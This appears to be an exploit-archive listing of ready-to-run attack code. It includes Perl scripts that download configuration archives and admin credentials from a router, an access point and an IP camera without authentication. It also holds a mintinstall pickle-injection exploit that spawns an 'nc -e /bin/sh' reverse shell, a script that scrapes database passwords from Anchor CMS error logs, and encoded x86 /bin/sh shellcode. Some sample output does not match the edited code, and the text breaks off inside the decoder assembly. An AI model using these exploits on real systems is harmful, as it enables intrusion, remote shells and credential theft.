
Tellion TE01-005H HomeHub Router Remote Configuration Disclosure


Tellion TE01-005H HomeHub router remote configuration disclosure exploit.


MD5 | 9adb7a7f59b731ca830dbc397e0df0c7

#!/usr/bin/perl -w
#
# Tellion TE01-005H HomeHub Router Remote Configuration Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ Tellion TE01-005H HomeHub Router Remote Configuration Disclosure
# # [ ================================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> Referer => http://192.168.1.101:2040
# # [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Accept-Ranges => bytes
# # [ << Content-Length => 21410
# # [ << Content-Type => application/octet-stream
# # [ << Client-Date => Wed, 02 Oct 2019 06:24:48 GMT
# # [ << Client-Peer => 192.168.1.101:2040
# # [ << Client-Response-Num => 1
# # [ << Content-Disposition => attachment;filename="config.tgz"
# # [ << Content-Transfer-Encoding => binary
# # [ << Set-Cookie => QSESSIONID=86edd87d47e015af5c8f6a96028f0492; path=/
# # [
# # [ >> Configuration dump...
# # [
# # [ # To avoid automatic reconfiguration, wps_configured=1 is set;
# # [ # however, WPS is allowed otherwise.
# # [ # Note wps_auth_type_flags=1 (open) and wps_encr_type_flags=1 (none)
# # [ ignore_file_errors=1
# # [ logger_syslog=-1
# # [ logger_syslog_level=2
# # [ logger_stdout=-1
# # [ logger_stdout_level=2
# # [ debug=0
# # [ dump_file=/tmp/hostapd.dump
# # [ ctrl_interface=/var/run/hostapd
# # [ ctrl_interface_group=0
# # [ ssid=SoIP
# # [ dtim_period=2
# # [ max_num_sta=255
# # [ macaddr_acl=0
# # [ auth_algs=1
# # [ ignore_broadcast_ssid=0
# # [ wme_enabled=0
# # [ ieee8021x=0
# # [ eapol_version=2
# # [ eapol_key_index_workaround=0
# # [ eap_server=1
# # [ eap_user_file=/etc/wpa2/hostapd.eap_user
# # [ wpa=0
# # [
# # [ ******
# # [ ******
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
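my $host = shift || 'https://192.168.1.1'; # Base URL of the target router (scheme://host[:port])
$host =~ s{/$}{};
# Screen-clearing escapes go to STDERR like the banner, so a redirected STDOUT
# holds only the configuration dump.
print STDERR "\033[2J";   # clear the screen
print STDERR "\033[0;0H"; # jump to 0,0
print STDERR "[ Tellion TE01-005H HomeHub Router Remote Configuration Disclosure\n";
print STDERR "[ ================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/) {
    print STDERR "[ e.g. perl $0 https://target:port/\n";
    exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
# verify_hostname => 0 disables TLS identity checks (the device is expected to
# present a self-signed certificate). That also makes this tool trivially
# MITM-able, so only run it on a network segment you control.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 },
);
$browser->timeout(30);
$browser->agent($user_agent);
# Unauthenticated CGI that hands back the configuration archive. The original
# listing spelled the path and the body as \x-escapes; these are the decoded
# values (useful for writing detections as well as for reading the code).
my $target  = $host . '/cgi-bin/system_config_file';
my $payload = 'config_cmd=%C0%FA%C0%E5';
my $request = HTTP::Request->new(
    POST => $target,
    [ Content_Type => 'application/x-www-form-urlencoded', Referer => $host ],
    $payload,
);
# LWP::UserAgent->request always returns a response object, so the original
# "request() or die" could never fire; the HTTP status must be checked.
my $response = $browser->request($request);
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
die "[ Exploit Failed: " . $response->status_line . "\n" unless $response->is_success;
my $gzip = $response->content();
# A fixed or different device answers with HTML/text instead of a gzip stream;
# check the gzip magic (1f 8b) rather than letting gunzip() die on garbage.
die "[ Exploit Failed: response is not gzip-compressed (patched firmware or wrong device?)\n"
    unless defined $gzip && substr($gzip, 0, 2) eq "\x1f\x8b";
# The archive is a .tgz; gunzip() yields the raw tar stream, which is printed
# line by line (tar headers included) exactly as the sample run above shows.
print STDERR "[\n[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/, gunzip($gzip));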


ipwndfu Jailbreaking Tool


ipwndfu is an open-source jailbreaking tool for many iOS devices. It is a tool meant for researchers that allows for dumping SecureROM, decrypting keybags for iOS firmware, and demoting device for JTAG among other functionalities.


MD5 | 245becd9c75ab246a97c2f43c79f23fc


mintinstall 7.9.9 Code Execution


mintinstall version 7.9.9 suffers from an object injection vulnerability.


MD5 | c32280029785d48451f33342094c5899

# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
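def shellCode(payload):
    """Write ``payload`` into mintinstall's review cache file.

    The file is ``$HOME/.cache/mintinstall/reviews.cache``. The payload the
    ``__main__`` block passes in is a protocol-0 pickle stream, so this
    presumably relies on mintinstall unpickling that cache on start-up
    (CVE-2019-17080 per the header); the loader itself is not visible here.

    Raises SystemExit if HOME is unset, since the target path cannot be
    determined in that case.
    """
    home = os.getenv("HOME")
    if not home:
        raise SystemExit("[!] HOME is not set; cannot locate the mintinstall cache")
    cache_dir = os.path.join(home, ".cache", "mintinstall")
    # The cache directory does not exist until mintinstall has been run at
    # least once; the original open() then failed with ENOENT.
    os.makedirs(cache_dir, exist_ok=True)
    with open(os.path.join(cache_dir, "reviews.cache"), "w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")


if __name__ == "__main__":
    # The original printed usage from the `else` branch of the __main__
    # guard, i.e. never when run as a script, and then crashed on argv[1];
    # check the argument count instead.
    if len(sys.argv) != 3:
        print("[!] exploit.py [IP] [PORT]")
        sys.exit(1)
    ip, port = sys.argv[1], sys.argv[2]
    # Protocol-0 pickle opcodes: GLOBAL os.system, MARK, STRING, TUPLE,
    # REDUCE, STOP -> os.system("nc -e /bin/sh IP PORT") on load.
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {ip} {port}"\ntR.""")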

Anchor CMS 0.12.3a Information Disclosure


Anchor CMS version 0.12.3a information disclosure exploit.


MD5 | 4f373c5848d717bbfc37638c8002c6a2

# Exploit Title: Information disclosure (MySQL password) in error log
# Date: 2/10/2019
# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/releases
# Version: 0.12.3a
# Tested on: Linux
# CVE : CVE-2018-7251

# By default, AnchorCMS will log errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentially sensitive information. Sometimes the AnchorCMS error log contains occurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs the variables of the MySQL connector class (including the database password) are serialized into a JSON object and logged to the error log.

import importlib.util
import re
import sys


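def get_plain(url):
    """GET ``url`` and return the response, or ``None`` if it cannot be fetched.

    Uses the third-party ``requests`` module, which the ``__main__`` block
    imports after checking it is installed. Transport errors and non-200
    answers are both folded into ``None``: a 403/404 for errors.log means
    the file is not exposed, and the caller only distinguishes "got it"
    from "did not".
    """
    try:
        # A timeout keeps the tool from hanging forever on a silent host.
        response = requests.get(url=url, timeout=30)
    except requests.RequestException:
        # Narrower than the original bare `except:` so Ctrl-C still works.
        return None
    if response.status_code != 200:
        return None
    return response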


def print_usage():
    """Print the one-line invocation help (script name plus the URL argument)."""
    script_name = __file__
    print("Usage: %s <url>" % script_name)


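if __name__ == '__main__':

    # Ensure we have the URL
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    print("* Using AnchorCMS website: " + sys.argv[1])

    # `requests` is third-party: probe for it first so a missing module gives
    # an install hint instead of a traceback. The import below binds the
    # module-level name that get_plain() uses.
    print("* Trying to import 'requests' module")
    requests_loader = importlib.util.find_spec('requests')
    requests_module_found = requests_loader is not None

    if requests_module_found:
        import requests
    else:
        print("* 'requests' module not found, please install it using pip")
        print("* pip install requests")
        sys.exit(1)

    # Only trailing slashes are trimmed; the original strip("/") would also
    # eat leading ones.
    json_url = sys.argv[1].rstrip("/") + "/anchor/errors.log"
    print("* Trying to get errors.log file at: {}".format(json_url))
    plain_result = get_plain(json_url)

    if plain_result is None:
        print("* URL could not be requested, errors.log is probably not exposed")
        sys.exit(1)

    # get_plain() returns a response object for any HTTP status; a 404 page
    # would otherwise be reported as "found data".
    if plain_result.status_code != 200:
        print("* Got HTTP {}, errors.log is probably not exposed".format(plain_result.status_code))
        sys.exit(1)

    print("* Found data {}, trying to parse it now".format(plain_result))

    # Every logged entry carries a "line":<n> field; count them.
    lines = re.findall(r'"line":\d+', plain_result.text)

    print("* Found {} error entries".format(len(lines)))

    # The serialized connector object (see the note above) is a bracketed
    # JSON chunk containing a "password" key; capture the text around it.
    passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)

    print("* Found {} passwords entries".format(len(passwords)))

    for password in passwords:
        print("+ {}".format(password))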

Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure


Dongyoung Media DM-AP240T/W wireless access point remote configuration disclosure exploit.


MD5 | 0d57c8105d3612e57d08a7865f1390fa

#!/usr/bin/perl -w
#
# Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# PASSWORD DISCLOSURE, TEST:
#
# # [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080
# # [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
# # [ =================================================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> Referer => http://192.168.1.102
# # [ >> User-Agent => Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Accept-Ranges => bytes
# # [ << Content-Length => 33412
# # [ << Content-Type => application/octet-stream
# # [ << Client-Date => Thu, 03 Oct 2019 10:41:05 GMT
# # [ << Client-Peer => 192.168.1.102:8080
# # [ << Client-Response-Num => 1
# # [ << Content-Disposition => attachment;filename="config.tgz"
# # [ << Content-Transfer-Encoding => binary
# # [ << Set-Cookie => QSESSIONID=ea4bfb8c9455d441efefc531841d7459; path=/
# # [
# # [ Admin User : ktroot
# # [ Admin Pass : 1234567890
# # [test@localhost ~]$
#
#
# CONFIGURATION DUMP, TEST:
#
# # [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080 show | head
# # [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure
# # [ =================================================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> Referer => http://192.168.1.102
# # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.0 (like Gecko)
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Accept-Ranges => bytes
# # [ << Content-Length => 33415
# # [ << Content-Type => application/octet-stream
# # [ << Client-Date => Thu, 03 Oct 2019 10:15:16 GMT
# # [ << Client-Peer => 192.168.1.102:8080
# # [ << Client-Response-Num => 1
# # [ << Content-Disposition => attachment;filename="config.tgz"
# # [ << Content-Transfer-Encoding => binary
# # [ << Set-Cookie => QSESSIONID=34f95926faa74a38c4bf527c2545e816; path=/
# # [
# # [ >> Configuration dump...
# # [
# # [ ./config/0000755000000000000000000000000013545344507011170 5ustar rootroot./config/hostapd_open_ath11.conf0000644000000000000000000000060400000000012015452 0ustar rootrootignore_file_errors=1
# # [ logger_syslog=-1
# # [ logger_syslog_level=2
# # [ logger_stdout=-1
# # [ logger_stdout_level=2
# # [ debug=0
# # [ ctrl_interface=/var/run/hostapd
# # [ ctrl_interface_group=0
# # [ ssid=ATH11
# # [ ignore_broadcast_ssid=0
# # [test@localhost ~]$
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
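my $host = shift || ''; # Base URL of the target access point (scheme://host[:port])
my $cmd  = shift || ''; # "show" dumps the whole configuration; otherwise only the admin credentials are printed
$host =~ s{/$}{};
# Screen-clearing escapes go to STDERR like the banner, so a redirected STDOUT
# holds only the dump / credentials.
print STDERR "\033[2J";   # clear the screen
print STDERR "\033[0;0H"; # jump to 0,0
print STDERR "[ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure\n";
print STDERR "[ =================================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/) {
    print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
# verify_hostname => 0 disables TLS identity checks (self-signed device
# certificate expected). The tool is therefore MITM-able; use it only on a
# network segment you control.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 },
);
$browser->timeout(30);
$browser->agent($user_agent);
# Unauthenticated CGI returning the configuration archive. The original
# listing spelled the path and body as \x-escapes; these are the decoded values.
my $target  = $host . '/cgi-bin/sys_system_config';
my $payload = 'config_cmd=%C0%FA%C0%E5';
my $request = HTTP::Request->new(
    POST => $target,
    [ Content_Type => 'application/x-www-form-urlencoded', Referer => $host ],
    $payload,
);
# request() always returns a response object, so "or die" never fired in the
# original; the HTTP status has to be checked explicitly.
my $response = $browser->request($request);
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
die "[ Exploit Failed: " . $response->status_line . "\n" unless $response->is_success;
my $gzipped = $response->content();
# Refuse anything that is not a gzip stream (magic 1f 8b) instead of letting
# gunzip() die on an HTML error page from a patched or different device.
die "[ Exploit Failed: response is not gzip-compressed (patched firmware or wrong device?)\n"
    unless defined $gzipped && substr($gzipped, 0, 2) eq "\x1f\x8b";
# gunzip() of the .tgz yields the raw tar stream; it is searched/printed as-is.
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
    print STDERR "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
}
# Credentials are stored in clear text in the archive under ROOT_ID/ROOT_PW
# (the keys the sample run in the header matched).
my $found = 0;
if ($config =~ /ROOT_ID=(.*)/) {
    print "[ Admin User : ", $1, "\n";
    $found = 1;
}
if ($config =~ /ROOT_PW=(.*)/) {
    print "[ Admin Pass : ", $1, "\n";
    $found = 1;
}
print STDERR "[ No ROOT_ID/ROOT_PW entries found in the archive; re-run with 'show' to inspect it\n"
    unless $found;
exit;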

Hisilicon Hi3518 HD Camera Remote Configuration Disclosure


Hisilicon Hi3518 HD camera remote configuration disclosure exploit.


MD5 | bfcd9951e1db1e9212930f1ac9a13d92

#!/usr/bin/perl -w
#
# Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
# # [ ==========================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; OpenBSD) KHTML/3.5.9 (like Gecko)
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Date => Thu, 03 Oct 2019 13:11:15 GMT
# # [ << Accept-Ranges => bytes
# # [ << Server => thttpd/2.25b 29dec2003
# # [ << Content-Length => 23878
# # [ << Content-Type => application/octet-stream
# # [ << Last-Modified => Thu, 03 Oct 2019 13:11:14 GMT
# # [ << Client-Date => Thu, 03 Oct 2019 13:11:23 GMT
# # [ << Client-Peer => 192.168.1.1:80
# # [ << Client-Response-Num => 1
# # [
# # [ Username : admin
# # [ Password : admin
#
#
# CONFIGURATION DUMP, TEST:
#
# # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
# # [ ==========================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> User-Agent => Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.14) Gecko/20080821 Firefox/2.0.0.14
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Date => Thu, 03 Oct 2019 13:13:05 GMT
# # [ << Accept-Ranges => bytes
# # [ << Server => thttpd/2.25b 29dec2003
# # [ << Content-Length => 23878
# # [ << Content-Type => application/octet-stream
# # [ << Last-Modified => Thu, 03 Oct 2019 13:13:04 GMT
# # [ << Client-Date => Thu, 03 Oct 2019 13:13:13 GMT
# # [ << Client-Peer => 192.168.1.1:80
# # [ << Client-Response-Num => 1
# # [
# # [ >> Configuration dump...
# # [
# # [ # # [debuglog]
# # [ minlevel = "7 ";ȡֵ��Χ:
# # [ ; 0,""
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "n " ;�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "y " ;�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = "/bin/vs/log/debuglog.txt ";
# # [ filemaxsize = "500 ";�����ļ�����������,��KBΪ��λ
# # [
# # [ # # [syslog]
# # [ minlevel = "7 ";ȡֵ��Χ:
# # [ ; 0,""
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "y ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "n ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = "";
# # [ filemaxsize = "";�����ļ�����������,��KBΪ��λ
# # [
# # [ # # [accesslog]
# # [ minlevel = "5 ";ȡֵ��Χ:
# # [ ; 0,""
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "n ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "y ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = "/bin/vs/log/accesslog.txt ";
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

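my $host = shift || ''; # Base URL of the target camera (scheme://host[:port])
my $cmd  = shift || ''; # "show" dumps the whole configuration; otherwise only the credentials are printed
$host =~ s{/$}{};
# Screen-clearing escapes go to STDERR like the banner, so a redirected STDOUT
# holds only the dump / credentials.
print STDERR "\033[2J";   # clear the screen
print STDERR "\033[0;0H"; # jump to 0,0
print STDERR "[ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure\n";
print STDERR "[ ==========================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/) {
    print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
# verify_hostname => 0 disables TLS identity checks (self-signed device
# certificate expected). The tool is therefore MITM-able; use it only on a
# network segment you control.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 },
);
$browser->timeout(30);
$browser->agent($user_agent);
# Unauthenticated backup CGI, reachable with a plain GET. The original listing
# spelled the path as \x-escapes; this is the decoded value.
my $target = $host . '/web/cgi-bin/hi3510/backup.cgi';
# The Content-Type header is pointless on a GET but harmless; kept so the
# request matches the one the sample runs above were produced with.
my $request = HTTP::Request->new(
    GET => $target,
    [ Content_Type => 'application/x-www-form-urlencoded' ],
);
# request() always returns a response object, so "or die" never fired in the
# original; the HTTP status has to be checked explicitly.
my $response = $browser->request($request);
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
die "[ Exploit Failed: " . $response->status_line . "\n" unless $response->is_success;
my $gzipped = $response->content();
# Refuse anything that is not a gzip stream (magic 1f 8b) instead of letting
# gunzip() die on an HTML error page from a patched or different device.
die "[ Exploit Failed: response is not gzip-compressed (patched firmware or wrong device?)\n"
    unless defined $gzipped && substr($gzipped, 0, 2) eq "\x1f\x8b";
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
    print STDERR "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
}
# Credentials are stored in clear text as username=/password= entries (the
# keys the sample run in the header matched). Note the match is a prefix
# match: the first line containing "username=" wins.
my $found = 0;
if ($config =~ /username=(.*)/) {
    print "[ Username : ", $1, "\n";
    $found = 1;
}
if ($config =~ /password=(.*)/) {
    print "[ Password : ", $1, "\n";
    $found = 1;
}
print STDERR "[ No username=/password= entries found in the backup; re-run with 'show' to inspect it\n"
    unless $found;
exit;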

Linux/x86 NOT + XOR-N + Random Encoded /bin/sh Shellcode


132 bytes small Linux/x86 NOT + XOR-N + random encoded /bin/sh shellcode.


MD5 | 79d36fbbe4c332f863dc6055dca40087

# Date: 4th October 2019
# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
# Tested on: Linux x86

######################## execve.asm ###############################

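global _start

section .text
_start:

    ; execve("//bin/sh", ["//bin/sh", NULL], NULL) via int 0x80.
    ; The path is written as "//bin/sh" (8 bytes) so it fits exactly two
    ; pushes and no NUL byte has to appear in the code itself.

    ; NUL terminator for the path string
    xor eax, eax
    push eax

    ; "//bin/sh" pushed little-endian: "n/sh" first, then "//bi"
    ; (the original listing had this comment as "//bin/sh" without the ';',
    ; which NASM rejects -- only ';' starts a comment)
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp            ; ebx = pathname

    ; envp = pointer to a NULL dword
    push eax
    mov edx, esp            ; edx = envp

    ; argv = [pathname, NULL]; the NULL is the dword just pushed for envp
    push ebx
    mov ecx, esp            ; ecx = argv

    ; __NR_execve is 11 on i386 Linux
    mov al, 11
    int 0x80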
###############################################################

compile the execve-stack
$ nasm -f elf32 execve.asm
$ ld -N -o execve execve.o
$ echo;objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

########################## encoder_mixer.py ####################

#!/usr/bin/python

# Python Encoder (XOR + NOT + Random)
import random
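green = lambda text: '\033[0;32m' + text + '\033[0m'

# Marker bytes the decoder_mixer.asm stub looks for at every third position:
#   0xbb -> the following byte was XOR-ed with XOR_KEY
#   0xcc -> the following byte was bit-inverted (NOT)
#   0xaa -> end of the encoded stream
# Each (marker, encoded byte) pair is followed by one random filler byte in
# 1..169; 169 < 0xaa, so a filler can never be confused with a marker.
XOR_KEY = 0xDD
MARK_XOR = 0xbb
MARK_NOT = 0xcc
MARK_END = 0xaa
FILLER_MAX = 169


def encode_bytes(raw):
    """Return the encoded stream for `raw` (iterable of byte values) as a list of ints.

    Bytes below 0x80 are XOR-ed with XOR_KEY; since XOR_KEY has its top bit
    set and the input does not, the result is never 0x00. Bytes 0x80 and
    above are NOT-ed. NOTE: a raw 0xff byte NOT-encodes to 0x00, so the
    scheme does not guarantee a NUL-free output for arbitrary input; the
    caller prints a warning when that happens.
    """
    out = []
    for x in raw:
        if x < 128:
            out += [MARK_XOR, x ^ XOR_KEY]
        else:
            out += [MARK_NOT, (~x) & 0xff]
        out.append(random.randint(1, FILLER_MAX))
    out.append(MARK_END)
    return out


def as_c_string(stream):
    """Format byte values as a \\xNN C string body."""
    return ''.join('\\x%02x' % b for b in stream)


def as_nasm_db(stream):
    """Format byte values as a comma-separated 0xNN list for a NASM `db` line."""
    return ','.join('0x%02x' % b for b in stream)


# execve("//bin/sh") shellcode from execve.asm above.
shellcode = bytearray(
    b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)

print('Encoded shellcode ...')
encoded = encode_bytes(shellcode)

print(green("Shellcode Len: %d" % len(shellcode)))
# The original reported len() of the "\xNN" text, i.e. 4 characters per byte
# (300 for a 75-byte stream); report the real byte count instead.
print(green("Encoded Shellcode Len: %d" % len(encoded)))
if 0 in encoded:
    print(green("WARNING: encoded stream contains a NUL byte (raw 0xff input)"))
print(as_c_string(encoded))
print(green("NASM version:"))
print(as_nasm_db(encoded))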

###################################################################

root@root:$ ./encoder_mixer.py
Encoded shellcode ...
Shellcode Len: 25
Encoded Shellcode Len: 300
\xbb\xec\x26\xcc\x3f\x4a\xbb\x8d\x3d\xbb\xb5\x44\xbb\xb3\x5b\xbb\xf2\x65\xbb\xae\x09\xbb\xb5\x2a\xbb\xb5\x2b\xbb\xf2\x1a\xbb\xf2\x4d\xbb\xbf\x9a\xbb\xb4\x61\xcc\x76\x56\xcc\x1c\x59\xbb\x8d\x56\xcc\x76\x6c\xcc\x1d\x94\xbb\x8e\x02\xcc\x76\xa5\xcc\x1e\x6d\xcc\x4f\xa3\xbb\xd6\x22\xcc\x32\x18\xcc\x7f\x7b\xaa
NASM version:
0xbb,0xec,0x26,0xcc,0x3f,0x4a,0xbb,0x8d,0x3d,0xbb,0xb5,0x44,0xbb,0xb3,0x5b,0xbb,0xf2,0x65,0xbb,0xae,0x09,0xbb,0xb5,0x2a,0xbb,0xb5,0x2b,0xbb,0xf2,0x1a,0xbb,0xf2,0x4d,0xbb,0xbf,0x9a,0xbb,0xb4,0x61,0xcc,0x76,0x56,0xcc,0x1c,0x59,0xbb,0x8d,0x56,0xcc,0x76,0x6c,0xcc,0x1d,0x94,0xbb,0x8e,0x02,0xcc,0x76,0xa5,0xcc,0x1e,0x6d,0xcc,0x4f,0xa3,0xbb,0xd6,0x22,0xcc,0x32,0x18,0xcc,0x7f,0x7b,0xaa

#################### decoder_mixer.asm ############################

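global _start

section .text
_start:

    ; JMP/CALL/POP: the CALL at call_decoder pushes the address of the
    ; encoded buffer (label `shellcode`), which the decoder pops into ESI.
    jmp short call_decoder


decoder:
    ; The stream is a sequence of 3-byte groups (marker, encoded byte, random
    ; filler) terminated by a lone 0xaa marker. Decoded bytes are written back
    ; in place from the start of the buffer: the write cursor (EDI) advances
    ; 1 per group while the read cursor (ESI+EAX) advances 3, so writes never
    ; overtake unread input. Because the stub writes into its own code, the
    ; memory it runs from must be writable as well as executable (hence
    ; -z execstack in the C harness; link the standalone binary with ld -N).
    pop esi
    lea edi, [esi]          ; EDI = write cursor (start of buffer)
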